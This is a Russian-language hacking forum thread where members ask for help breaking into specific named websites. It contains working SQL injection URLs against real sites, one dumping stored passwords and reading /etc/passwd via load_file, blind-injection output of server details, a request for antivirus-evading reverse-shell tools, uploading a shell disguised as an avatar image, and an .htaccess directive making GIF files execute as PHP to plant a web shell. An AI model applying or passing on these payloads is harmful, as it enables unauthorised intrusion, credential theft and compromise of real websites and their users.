Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by darky, 4 Aug 2007.

Thread Status:
Not open for further replies.
  1. Gorev

    Gorev Level 8

    Joined:
    31 Mar 2006
    Messages:
    2,548
    Likes Received:
    1,244
    Reputations:
    273
    вот именно что нет там бейс авторизации, просто еще одно поле добавилось в логинилке...
     
  2. Gorev

    Gorev Level 8

    Joined:
    31 Mar 2006
    Messages:
    2,548
    Likes Received:
    1,244
    Reputations:
    273
    да обычная логинилка в админку форума, только еще поле куда личный код админа надо вводить помимо пароля
    PHP:
    <form action='http://forum.site.ru/admin.php?adsess=' method='post' name='theAdminForm' > <input type='hidden' name='adsess' value=''> <input type='hidden' name='login' value='yes'><div class='tableborder'> <div class='maintitle'>Требование авторизации</div> <table width='100%' cellspacing='0' cellpadding='5' align='center' border='0'><tr> </tr> <tr> <td class='tdrow1' width='40%' valign='middle'>Ваше имя:</td> <td class='tdrow2' width='60%' valign='middle'><input type='text' style='width:100%' name='username' value='Libra'></td> </tr> <tr> <td class='tdrow1' width='40%' valign='middle'>Ваш пароль:</td> <td class='tdrow2' width='60%' valign='middle'><input type='password' style='width:100%' name='password' value=''></td> </tr> <tr> <td class='tdrow1' width='40%' valign='middle'>Ваш личный код:</td> <td class='tdrow2' width='60%' valign='middle'><input type='password' style='width:100%' name='ppassword' value=''></td> </tr> <tr><td align='center' class='pformstrip' colspan='2' ><input type='submit' value='Войти' id='button' accesskey='s'></td></tr> </form></table></div><br />
     
  3. Gorev

    Gorev Level 8

    Joined:
    31 Mar 2006
    Messages:
    2,548
    Likes Received:
    1,244
    Reputations:
    273
    да уже сам вкурил что к чему...тот же форум почитал...читалка не робит , так что шансы на заливку шелла урезались очень сильно.Но в любом случае спасибо большое з аоказанную помосйь и потерянное время.
     
  4. jecka3000

    jecka3000 Elder - Старейшина

    Joined:
    15 Mar 2008
    Messages:
    372
    Likes Received:
    54
    Reputations:
    4
    Хочу применить всем ивестную дыру в vbseo 3.3.2 (инклуд). Но столкнулся с проблемов. Когда хочу поставить картинку с шеллом себе на аватар пишет:

    хотя и размеры правильные и все остальное.

    Как решить эту проблему?
     
  5. FAQ666

    FAQ666 Elder - Старейшина

    Joined:
    17 Sep 2008
    Messages:
    38
    Likes Received:
    18
    Reputations:
    8
    Через что можно сделать back connect кроме netcat. Net cat не подходит, т.к. палится антивирусом.
    Читал что можно через netwox но так и не разобрался как. Знающие подскажите!
     
  6. Darren

    Darren Banned

    Joined:
    14 Jun 2008
    Messages:
    34
    Likes Received:
    5
    Reputations:
    6
    Помогите please докрутить скуль

    http://www.nnovia.com/products.php?id=31%20and%201=2
     
  7. Pashkela

    Pashkela Динозавр

    Joined:
    10 Jan 2008
    Messages:
    2,750
    Likes Received:
    1,044
    Reputations:
    339
    Code:
    http://www.nnovia.com/products.php?id=-31+or+1=1+and+substring(version(),1,1)=5
    
    Blind MYsql system information:
    ----------------------------------
    @@basedir: /
    @@tmpdir: /tmp/
    database(): nnovia3_osc1
    @@version_compile_os: pc-linux-gnu
    version(): 5.0.89-community
    @@datadir: /var/lib/mysql/
    user(): nnovia3_osc1@localhost
    
     
  8. AC//DC

    AC//DC Active Member

    Joined:
    28 Jul 2009
    Messages:
    419
    Likes Received:
    147
    Reputations:
    88
    а таблицы с юзверями там всеравно нет.....
     
  9. Darren

    Darren Banned

    Joined:
    14 Jun 2008
    Messages:
    34
    Likes Received:
    5
    Reputations:
    6
    2 Pashkela thanks.

    Я ввожу твою строку

    http://www.nnovia.com/products.php?id=-31+or+1=1+and+substring(version(),1,1)=5

    и на экране ничего не выводится. или эта конструкция работает только с тулзой?
     
    #12189 Darren, 5 Apr 2010
    Last edited: 6 Apr 2010
  10. Atra Pluvia

    Atra Pluvia Banned

    Joined:
    5 Apr 2010
    Messages:
    1
    Likes Received:
    0
    Reputations:
    0
    От того, какая версия мускула стоит.
     
  11. AC//DC

    AC//DC Active Member

    Joined:
    28 Jul 2009
    Messages:
    419
    Likes Received:
    147
    Reputations:
    88
    может кто поможет и подскажет как раскрутить....
    получен доступ к password а к login нет
    http://www.sellbrand.ru/user/account.php?area=public&action=fr_search_view&fid=196&uid=-167+and+1=2+union+all+select+aes_decrypt(aes_encrypt(group_concat(pwd,0x3a+SEPARATOR+0x0b),0x71),0x71),2,3,4,5+from+users--
    решил использовать load_file('/etc/passwd')
    http://www.sellbrand.ru/user/account.php?area=public&action=fr_search_view&fid=196&uid=-167+and+1=2+union+all+select+load_file(0x2f6574632f706173737764),2,3,4,5+from+users--
    получил права на чтение файлов
    /home/
    http://www.sellbrand.ru/user/account.php?area=public&action=fr_search_view&fid=196&uid=-167+and+1=2+union+all+select+load_file(0x2f686f6d652f),2,3,4,5+from+users--
    а вот в дальнейших деррикториях я запутался
     
  12. ZeroCold

    ZeroCold New Member

    Joined:
    9 Mar 2010
    Messages:
    22
    Likes Received:
    0
    Reputations:
    0
    Вопрос все еще актуален, нужны свежие идеи ))
     
  13. Gorev

    Gorev Level 8

    Joined:
    31 Mar 2006
    Messages:
    2,548
    Likes Received:
    1,244
    Reputations:
    273
    в скуле фильтруются () как обойти? хексил, 0х28 0х29 не помогает.какие предложения?
     
  14. auth_root

    auth_root Member

    Joined:
    31 Jan 2010
    Messages:
    17
    Likes Received:
    10
    Reputations:
    0
    Пытаюсь раскрутить site.com/search_result.php?(куча параметров)&country=13+order+by+1/*

    Выплевовает ошибку

    Как обойти? Я новичек, посоветуйте плз.
     
  15. auth_root

    auth_root Member

    Joined:
    31 Jan 2010
    Messages:
    17
    Likes Received:
    10
    Reputations:
    0
    budden пробовал закрывать скобки уже, не катит.and 1=0 тут не причём, тем более если &country=-1, можно просто 99999999 или +limit+1,1 (так тоже принтабельные можно вывести) но не в этом случае. Т.к. поля подобрать всё равно не представлется возможным. Подзапросы юзать наверное тоже не выйдет, я просто не пойму как обрезать запрос...
     
  16. FlaktW

    FlaktW Elder - Старейшина

    Joined:
    19 Aug 2009
    Messages:
    496
    Likes Received:
    33
    Reputations:
    12
    Не могу найти админку: http://www.yellowbulletin.com/

    MS SQL

    сканером: security-digger.org
    не получается.
     
  17. Дирижабль

    Дирижабль [ ✯✯✯ Ядерный Суицид ✯✯✯ ]

    Joined:
    6 Jan 2010
    Messages:
    369
    Likes Received:
    346
    Reputations:
    292
    вроде http://www.yellowbulletin.com/cp/ но чета белое все
     
    _________________________
  18. daniel_1024

    daniel_1024 Elder - Старейшина

    Joined:
    15 Jul 2009
    Messages:
    260
    Likes Received:
    227
    Reputations:
    386
    есть возможность залить htaccess через админ-панель. как сделать так, чтобы сервер воспринимал gif-картинки как php-скрипты ?
     
  19. Sc0rpi0n

    Sc0rpi0n Banned

    Joined:
    23 Feb 2010
    Messages:
    75
    Likes Received:
    22
    Reputations:
    16
    AddType application/x-httpd-php .gif
     
    #12199 Sc0rpi0n, 6 Apr 2010
    Last edited: 5 Jun 2010
  20. mental2

    mental2 Elder - Старейшина

    Joined:
    13 Aug 2007
    Messages:
    4
    Likes Received:
    1
    Reputations:
    0
    Как думаете, реально раскрутить?
    http://starosti.ru/archive.php?m=10&y=1909'
     
Loading...
Thread Status:
Not open for further replies.